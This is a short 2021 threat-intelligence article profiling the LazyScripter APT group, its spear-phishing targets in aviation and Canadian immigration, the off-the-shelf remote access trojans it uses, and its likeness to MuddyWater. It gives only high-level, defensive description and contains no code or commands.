Home Malware Programs Advanced Persistent Threat (APT) LazyScripter APT

LazyScripter APT

Posted: February 26, 2021

LazyScripter APT is a newly identified Advanced Persistent Threat (APT) group whose activity, tools, and targets appear to overlap with those of other APT groups operating from the Middle East. However, there is not enough data to determine whether the LazyScripter APT shares members with other groups from the region or if they really operate from a country in the Middle East. The criminals appear to express high interest in airlines and immigration-related organizations in Canada. One of LazyScripter APT's big targets was the International Air Traffic Association (IATA.)

The criminals rely on spear-phishing emails to approach their targets, and it seems that their toolset is not very sophisticated. They rely on well-known malware families frequently, many of which are open-source. Some of LazyScripter APT's notable tools are Zebrocy, Octopus, Remcos and LuminosityLink. All of these are Remote Access Trojans (RATs) that enable their operators to perform a wide variety of tasks on compromised systems.

The LazyScripter APT Reminds Researchers of the MuddyWater APT

According to researchers, the LazyScripter APT modus operandi is very similar to that of the MuddyWater APT, an Iran-based group of cybercriminals. Both groups rely on similar tools, and they abuse PowerShell scripts frequently to perform additional tasks on compromised machines. Last but not least, both MuddyWater and LazyScripter's members abuse GitHub to host their payloads or other data related to their operations.

The first operations of the LazyScripter APT can be traced back to 2018, but the group appears to still be active in 2021. Thankfully, the fact that the criminals are using well-known malware families is likely to mean that organizations can protect their networks by investing in reliable and up-to-date anti-virus software.

Loading...